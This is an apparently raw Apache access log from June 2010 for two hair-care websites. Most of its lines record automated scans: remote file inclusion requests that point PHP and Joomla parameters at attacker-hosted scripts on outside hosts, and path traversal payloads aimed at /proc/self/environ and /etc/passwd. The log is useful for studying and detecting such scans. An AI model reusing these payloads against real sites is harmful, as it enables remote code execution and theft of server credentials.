95.130.10.37 - - [06/Jun/2010:21:25:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "http://err.lolipop.jp/403.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
67.195.37.176 - - [06/Jun/2010:21:25:35 -0700] "GET /?N=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
94.143.220.3 - - [06/Jun/2010:21:26:17 -0700] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://www.f1total.com.br/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.143.220.3 - - [06/Jun/2010:21:26:17 -0700] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://www.f1total.com.br/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.143.220.3 - - [06/Jun/2010:21:26:17 -0700] "GET /logs/scripts.log//modules/Forums/admin/index.php?phpbb_root_path=http://www.f1total.com.br/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [06/Jun/2010:21:27:43 -0700] "GET /logs/access.log//?g4[path]=http://oblspecstroi.ru///help/sh.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [06/Jun/2010:21:27:43 -0700] "GET /?g4[path]=http://oblspecstroi.ru///help/sh.jpg? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [06/Jun/2010:21:27:44 -0700] "GET /logs//?g4[path]=http://oblspecstroi.ru///help/sh.jpg? HTTP/1.1" 200 5805 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
109.123.73.50 - - [06/Jun/2010:21:28:24 -0700] "GET /logs/access_100412.log//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
109.123.73.50 - - [06/Jun/2010:21:28:24 -0700] "GET /nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
109.123.73.50 - - [06/Jun/2010:21:28:24 -0700] "GET /logs//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:21:28:29 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
91.121.75.82 - - [06/Jun/2010:21:29:21 -0700] "GET /logs/access_100412.log//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.75.82 - - [06/Jun/2010:21:29:21 -0700] "GET /nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.75.82 - - [06/Jun/2010:21:29:21 -0700] "GET /logs//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
62.149.207.129 - - [06/Jun/2010:21:35:08 -0700] "GET /components/com_flyspray/startdown.php?file=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.149.207.129 - - [06/Jun/2010:21:35:08 -0700] "GET /logs/access_100412.log//components/com_flyspray/startdown.php?file=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.149.207.129 - - [06/Jun/2010:21:35:08 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.149.207.129 - - [06/Jun/2010:21:35:12 -0700] "GET /components/com_flyspray/startdown.php?file=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.149.207.129 - - [06/Jun/2010:21:35:12 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.149.207.129 - - [06/Jun/2010:21:35:12 -0700] "GET /logs/access_100412.log//components/com_flyspray/startdown.php?file=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.20.138 - - [06/Jun/2010:21:46:38 -0700] "GET /index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.20.138 - - [06/Jun/2010:21:48:11 -0700] "GET /logs//index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.growlonghairfast.com"
174.121.20.138 - - [06/Jun/2010:21:48:14 -0700] "GET /index.php?option=com_flyspray&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:48:24 -0700] "GET /logs/write_update.php//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:48:24 -0700] "GET /write_update.php//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:48:25 -0700] "GET /logs/access_100412.log%20%20/write_update.php//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:48:29 -0700] "GET /logs/write_update.php//bbs//write_update.php?board_skin_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:48:29 -0700] "GET /write_update.php//bbs//write_update.php?board_skin_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:48:29 -0700] "GET /logs/access_100412.log%20%20/write_update.php//bbs//write_update.php?board_skin_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.0.30 - - [06/Jun/2010:21:55:21 -0700] "GET /logs//*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.0.30 - - [06/Jun/2010:21:55:24 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
59.42.10.71 - - [06/Jun/2010:21:58:58 -0700] "GET /logs/access_100308.log%20%20//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [06/Jun/2010:21:58:58 -0700] "GET /?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [06/Jun/2010:21:58:59 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.0" 200 5789 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:59:02 -0700] "GET /write_update.php//bbs//write_update.php?board_skin_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:59:02 -0700] "GET /logs/write_update.php//bbs//write_update.php?board_skin_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:59:03 -0700] "GET /logs/access_100412.log%20%20/write_update.php//bbs//write_update.php?board_skin_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:59:10 -0700] "GET /logs/access_100412.log%20%20/write_update.php//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:59:11 -0700] "GET /logs/write_update.php//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:21:59:11 -0700] "GET /write_update.php//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [06/Jun/2010:21:59:50 -0700] "GET /logs/scripts.log%20%20//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [06/Jun/2010:22:01:09 -0700] "GET /logs/access_100308.log%20%20//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [06/Jun/2010:22:01:09 -0700] "GET /?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [06/Jun/2010:22:01:09 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 200 5805 "-" "Mozilla/5.0" "growlonghairfast.com"
59.42.10.71 - - [06/Jun/2010:22:02:16 -0700] "GET /logs/scripts.log%20%20//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:22:02:53 -0700] "GET /logs/access_100412.log/write_update.php//bbs//write_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:22:02:53 -0700] "GET /logs/write_update.php//bbs//write_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:22:02:53 -0700] "GET /write_update.php//bbs//write_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:22:04:55 -0700] "GET /logs/access_100412.log%20%20/write_update.php//bbs//write_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:22:05:58 -0700] "GET /logs/access_100412.log/write_update.php//bbs//write_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:22:05:58 -0700] "GET /logs/write_update.php//bbs//write_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [06/Jun/2010:22:05:59 -0700] "GET /write_update.php//bbs//write_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [06/Jun/2010:22:06:52 -0700] "GET /logs/access.log//?g4[path]= HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [06/Jun/2010:22:06:53 -0700] "GET /?g4[path]= HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [06/Jun/2010:22:06:54 -0700] "GET /logs//?g4[path]= HTTP/1.1" 200 5805 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
59.42.10.71 - - [06/Jun/2010:22:07:05 -0700] "GET /logs/access.log%20%20//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [06/Jun/2010:22:07:05 -0700] "GET /?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [06/Jun/2010:22:07:05 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 200 5805 "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.38.67.248 - - [06/Jun/2010:22:07:42 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [06/Jun/2010:22:07:42 -0700] "GET /index.php?option=com_virtuemart&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
84.38.67.248 - - [06/Jun/2010:22:07:43 -0700] "GET /logs/index.php?option=com_virtuemart&page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
59.42.10.71 - - [06/Jun/2010:22:10:06 -0700] "GET /?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [06/Jun/2010:22:10:06 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 200 5805 "-" "Mozilla/5.0" "www.freehairsecrets.com"
59.42.10.71 - - [06/Jun/2010:22:10:06 -0700] "GET /logs/access.log%20%20//?_REQUEST=&_REQUEST[option]=http://arab-job.com/api/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [06/Jun/2010:22:10:34 -0700] "GET /logs/access_100412.log%20%20/write_update.php//bbs//write_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.8.3.157 - - [06/Jun/2010:22:11:14 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:43 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:43 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:43 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:44 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:44 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:44 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:45 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:45 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:45 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:46 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:46 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:46 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:48 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:48 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:48 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:48 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:48 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:48 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:48 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:48 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
173.236.10.170 - - [06/Jun/2010:22:11:48 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
207.46.199.177 - - [06/Jun/2010:22:17:26 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "freehairsecrets.com"
72.232.207.2 - - [06/Jun/2010:22:17:40 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:17:41 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:17:41 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:17:54 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:17:54 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:17:55 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
61.8.3.157 - - [06/Jun/2010:22:26:29 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
61.8.3.157 - - [06/Jun/2010:22:26:29 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
61.8.3.157 - - [06/Jun/2010:22:26:30 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:27:05 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:27:05 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:27:06 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
61.8.3.157 - - [06/Jun/2010:22:29:19 -0700] "GET /logs/access_100426.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
220.181.94.213 - - [06/Jun/2010:22:30:23 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:31:31 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:31:31 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:31:31 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:32:04 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:32:04 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:32:04 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:32:14 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:32:15 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:32:15 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:32:40 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:32:40 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:32:40 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
220.181.94.213 - - [06/Jun/2010:22:33:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14537 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:33:37 -0700] "GET /logs/access_100426.log//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:33:37 -0700] "GET /include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
72.232.207.2 - - [06/Jun/2010:22:33:37 -0700] "GET /logs//include/mail.inc.php?root=http://modelsntogs.com/file/attachment/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
208.100.59.16 - - [06/Jun/2010:22:38:19 -0700] "GET /logs/access_100222.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
208.100.59.16 - - [06/Jun/2010:22:38:19 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
208.100.59.16 - - [06/Jun/2010:22:38:19 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12869 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16223 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [06/Jun/2010:22:56:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15171 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
190.152.145.54 - - [06/Jun/2010:22:56:17 -0700] "GET /index.php?option=com_sef&mosConfig.absolute.path=http://www.mongolei-festival.de/pek1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
